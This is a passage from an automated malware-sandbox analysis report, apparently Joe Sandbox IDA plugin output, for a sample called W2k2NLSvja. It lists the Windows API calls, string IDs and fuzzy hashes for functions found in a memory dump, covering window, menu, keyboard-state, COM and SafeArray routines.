                                                                                                                        • Instruction Fuzzy Hash: 4121F6B4600785AFE7315F31EEC8B253B6AEB49B9AF400414F18186194DBFF9C04B7A2
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                                                                                                                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00FED855
                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00FED8E8
                                                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00FED8FC
                                                                                                                        • CoCreateInstance.OLE32(01012D7C,00000000,00000001,0103A89C,?), ref: 00FED948
                                                                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00FED9B7
                                                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 00FEDA0F
                                                                                                                        • _memset.LIBCMT ref: 00FEDA4C
                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00FEDA88
                                                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00FEDAAB
                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00FEDAB2
                                                                                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00FEDAE9
                                                                                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 00FEDAEB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1246142700-0
                                                                                                                        • Opcode ID: a84fefa0d4e0171bed90921977b1e3c82e9a9a4aff1e2084e861651d66a776fa
                                                                                                                        • Instruction ID: 5e8f752c7ca1ffc0a77ae497c42f39049f4aa4df9e8afa1cdb0f706989ee9da7
                                                                                                                        • Opcode Fuzzy Hash: a84fefa0d4e0171bed90921977b1e3c82e9a9a4aff1e2084e861651d66a776fa
                                                                                                                        • Instruction Fuzzy Hash: 42B10A75A00109AFDB14DFA5CC88EAEBBB9EF48714B048469F809EB251DB35EE41DB50
                                                                                                                        APIs
                                                                                                                        • GetKeyboardState.USER32(?), ref: 00FE05A7
                                                                                                                        • SetKeyboardState.USER32(?), ref: 00FE0612
                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00FE0632
                                                                                                                        • GetKeyState.USER32(000000A0), ref: 00FE0649
                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00FE0678
                                                                                                                        • GetKeyState.USER32(000000A1), ref: 00FE0689
                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00FE06B5
                                                                                                                        • GetKeyState.USER32(00000011), ref: 00FE06C3
                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00FE06EC
                                                                                                                        • GetKeyState.USER32(00000012), ref: 00FE06FA
                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00FE0723
                                                                                                                        • GetKeyState.USER32(0000005B), ref: 00FE0731
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 541375521-0
                                                                                                                        • Opcode ID: 39934009732a92e584e6f0f5a716aa782012b69d67a6ab313cbb68c88661502f
                                                                                                                        • Instruction ID: 1b997a7b73d8ea6667a8074285cab6dbe300ea27039cfdc263f866bff8fdd05c
                                                                                                                        • Opcode Fuzzy Hash: 39934009732a92e584e6f0f5a716aa782012b69d67a6ab313cbb68c88661502f
                                                                                                                        • Instruction Fuzzy Hash: 7951CA70E047C829FB35DBA288547EABFB49F41390F084599D5C2561C2DEE89BCCEB61
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00FDC746
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00FDC758
                                                                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00FDC7B6
                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00FDC7C1
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00FDC7D3
                                                                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00FDC827
                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00FDC835
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00FDC846
                                                                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00FDC889
                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00FDC897
                                                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00FDC8B4
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00FDC8C1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3096461208-0
                                                                                                                        • Opcode ID: 6f1c7a528f9f5c349aa7e7f5e4e151bc03c9954ea148d422dc88734c0647c53e
                                                                                                                        • Instruction ID: 1f8b64dceba77728ccd721840dbca74cdc14614eec417bb17101b0ec70866d1b
                                                                                                                        • Opcode Fuzzy Hash: 6f1c7a528f9f5c349aa7e7f5e4e151bc03c9954ea148d422dc88734c0647c53e
                                                                                                                        • Instruction Fuzzy Hash: FC512E71B00206ABDB28CF79DD89AAEBBBAFB88310F14812DF515D7294DB759D00DB50
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F81B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F82036,?,00000000,?,?,?,?,00F816CB,00000000,?), ref: 00F81B9A
                                                                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00F820D3
                                                                                                                        • KillTimer.USER32(-00000001,?,?,?,?,00F816CB,00000000,?,?,00F81AE2,?,?), ref: 00F8216E
                                                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00FBBEF6
                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F816CB,00000000,?,?,00F81AE2,?,?), ref: 00FBBF27
                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F816CB,00000000,?,?,00F81AE2,?,?), ref: 00FBBF3E
                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F816CB,00000000,?,?,00F81AE2,?,?), ref: 00FBBF5A
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00FBBF6C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 641708696-0
                                                                                                                        • Opcode ID: a8914645d3fe216695e85a75c89bd1baf088bbdcb6c661ac4ab8ac05d7fd1f34
                                                                                                                        • Instruction ID: 56cf0a545e55ac9c56d9065ec69cad7143d69571e73313ca8c5b78b27da0c283
                                                                                                                        • Opcode Fuzzy Hash: a8914645d3fe216695e85a75c89bd1baf088bbdcb6c661ac4ab8ac05d7fd1f34
                                                                                                                        • Instruction Fuzzy Hash: 1361AB75900611DFDB36AF55DA88BA9B7F1FF41322F10451CE0828A564D77AB881FF50
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F825DB: GetWindowLongW.USER32(?,000000EB), ref: 00F825EC
                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00F821D3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ColorLongWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 259745315-0
                                                                                                                        • Opcode ID: e91e348abbe8eb39601f837f968210cf51d7a73230f865f90772e88f87c48f2a
                                                                                                                        • Instruction ID: c3b5dafc81c8f131e3db582a8932e46904170b0e5e12fe72e732c0ac8a952fbc
                                                                                                                        • Opcode Fuzzy Hash: e91e348abbe8eb39601f837f968210cf51d7a73230f865f90772e88f87c48f2a
                                                                                                                        • Instruction Fuzzy Hash: 2041A331500140AFEB726F28D888BF93B65EB06331F144365FEA58A1E6C7369C42FB61
                                                                                                                        APIs
                                                                                                                        • CharLowerBuffW.USER32(?,?,0100F910), ref: 00FEAB76
                                                                                                                        • GetDriveTypeW.KERNEL32(00000061,0103A620,00000061), ref: 00FEAC40
                                                                                                                        • _wcscpy.LIBCMT ref: 00FEAC6A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                        • API String ID: 2820617543-1000479233
                                                                                                                        • Opcode ID: 5ff295ff447dc1a4e73902d2dff4cab6b3afe6de32218c0ba2906f9973832215
                                                                                                                        • Instruction ID: 06d91dfe38a4e0fa83947a79e8c1da87495fd80b6a1b774c878d49c01e7d5aa7
                                                                                                                        • Opcode Fuzzy Hash: 5ff295ff447dc1a4e73902d2dff4cab6b3afe6de32218c0ba2906f9973832215
                                                                                                                        • Instruction Fuzzy Hash: AB51DE712083429BC720EF19CC81AAAB7A9FF84710F14481DF4D6972A2DB35E909EB53
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __i64tow__itow__swprintf
                                                                                                                        • String ID: %.15g$0x%p$False$True
                                                                                                                        • API String ID: 421087845-2263619337
                                                                                                                        • Opcode ID: 094831fe43fdc7401f6c83663823d5f44b6eda218ba2762a1b244a4a2a8c355d
                                                                                                                        • Instruction ID: 4db5fa29815105aa0129c586f5e8bc25213c5a77a818275dd5ec8d52fd41a088
                                                                                                                        • Opcode Fuzzy Hash: 094831fe43fdc7401f6c83663823d5f44b6eda218ba2762a1b244a4a2a8c355d
                                                                                                                        • Instruction Fuzzy Hash: 47410372A08205AFDB24AB39DC42FBAB3E8EB45310F24446EF549D7281EE759905AB10
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 010073D9
                                                                                                                        • CreateMenu.USER32 ref: 010073F4
                                                                                                                        • SetMenu.USER32(?,00000000), ref: 01007403
                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01007490
                                                                                                                        • IsMenu.USER32(?), ref: 010074A6
                                                                                                                        • CreatePopupMenu.USER32 ref: 010074B0
                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 010074DD
                                                                                                                        • DrawMenuBar.USER32 ref: 010074E5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                        • String ID: 0$F
                                                                                                                        • API String ID: 176399719-3044882817
                                                                                                                        • Opcode ID: cc94a2a13efe0370c83159e0c9be932af28aa3f5f3149fcad9869e046ff8da90
                                                                                                                        • Instruction ID: 41e5da7172199508b65d04106da95028bfb66461a2072ba75710bcc3ca3e4b83
                                                                                                                        • Opcode Fuzzy Hash: cc94a2a13efe0370c83159e0c9be932af28aa3f5f3149fcad9869e046ff8da90
                                                                                                                        • Instruction Fuzzy Hash: D1415E74600205EFEB21DF68D884E9ABBF5FF49300F154069FA9597390DB3AA920DF50
                                                                                                                        APIs
                                                                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 010077CD
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 010077D4
                                                                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 010077E7
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 010077EF
                                                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 010077FA
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 01007803
                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0100780D
                                                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 01007821
                                                                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0100782D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                        • String ID: static
                                                                                                                        • API String ID: 2559357485-2160076837
                                                                                                                        • Opcode ID: 81995a8fed18f775f6d9ec3ecd9388eae712efa92d5a45df7449c2920b5f3606
                                                                                                                        • Instruction ID: f16a9d92f95be3028bddb70ccfd55fa1f634bb7fb892bdd0fb6329d769ca6248
                                                                                                                        • Opcode Fuzzy Hash: 81995a8fed18f775f6d9ec3ecd9388eae712efa92d5a45df7449c2920b5f3606
                                                                                                                        • Instruction Fuzzy Hash: F3316031101116ABEF239F74DC08FDA3BA9FF09761F114215FA95960D0DB3AE911EBA4
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00FA707B
                                                                                                                          • Part of subcall function 00FA8D68: __getptd_noexit.LIBCMT ref: 00FA8D68
                                                                                                                        • __gmtime64_s.LIBCMT ref: 00FA7114
                                                                                                                        • __gmtime64_s.LIBCMT ref: 00FA714A
                                                                                                                        • __gmtime64_s.LIBCMT ref: 00FA7167
                                                                                                                        • __allrem.LIBCMT ref: 00FA71BD
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FA71D9
                                                                                                                        • __allrem.LIBCMT ref: 00FA71F0
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FA720E
                                                                                                                        • __allrem.LIBCMT ref: 00FA7225
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FA7243
                                                                                                                        • __invoke_watson.LIBCMT ref: 00FA72B4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 384356119-0
                                                                                                                        • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                                                                                        • Instruction ID: 797c4b0759d583cd35e459303184336ac9c8d259f4d873a463a42c9e708e12a5
                                                                                                                        • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                                                                                        • Instruction Fuzzy Hash: 6071CBF1E44716ABD714AE79CC41F9BB7E8AF12324F14823AF514E7281E774E940AB90
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00FE2A31
                                                                                                                        • GetMenuItemInfoW.USER32(01046890,000000FF,00000000,00000030), ref: 00FE2A92
                                                                                                                        • SetMenuItemInfoW.USER32(01046890,00000004,00000000,00000030), ref: 00FE2AC8
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 00FE2ADA
                                                                                                                        • GetMenuItemCount.USER32(?), ref: 00FE2B1E
                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00FE2B3A
                                                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00FE2B64
                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 00FE2BA9
                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00FE2BEF
                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FE2C03
                                                                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FE2C24
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4176008265-0
                                                                                                                        • Opcode ID: f9a785e6939f467d3a620dcb1ba4ed66b52228cc1300d8d421d54c372aadcc16
                                                                                                                        • Instruction ID: fe3e1fe52f39cd44c99aa04ae1880f4ee08702641a2e1295ecb065e6d95a1985
                                                                                                                        • Opcode Fuzzy Hash: f9a785e6939f467d3a620dcb1ba4ed66b52228cc1300d8d421d54c372aadcc16
                                                                                                                        • Instruction Fuzzy Hash: 9E61C1B190028AAFDB61DF65CD88EBE7BBCFB41324F140559E84193241F736AD45EB21
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01007214
                                                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01007217
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0100723B
                                                                                                                        • _memset.LIBCMT ref: 0100724C
                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0100725E
                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 010072D6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$LongWindow_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 830647256-0
                                                                                                                        • Opcode ID: f7a01d0c939b279a263235c979bfdb2162ba5f2f8e392e8cc4bb460feee25ae9
                                                                                                                        • Instruction ID: a067e42a84266186157dc7e4b5232260c9bc38b651dadb46c3547b31361350f0
                                                                                                                        • Opcode Fuzzy Hash: f7a01d0c939b279a263235c979bfdb2162ba5f2f8e392e8cc4bb460feee25ae9
                                                                                                                        • Instruction Fuzzy Hash: C3618EB5900208AFEB21DFA8CC81EEE77F8EB09700F144199FA94A72D1D775A941DB60
                                                                                                                        APIs
                                                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00FD7135
                                                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00FD718E
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00FD71A0
                                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00FD71C0
                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00FD7213
                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00FD7227
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00FD723C
                                                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00FD7249
                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FD7252
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00FD7264
                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FD726F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
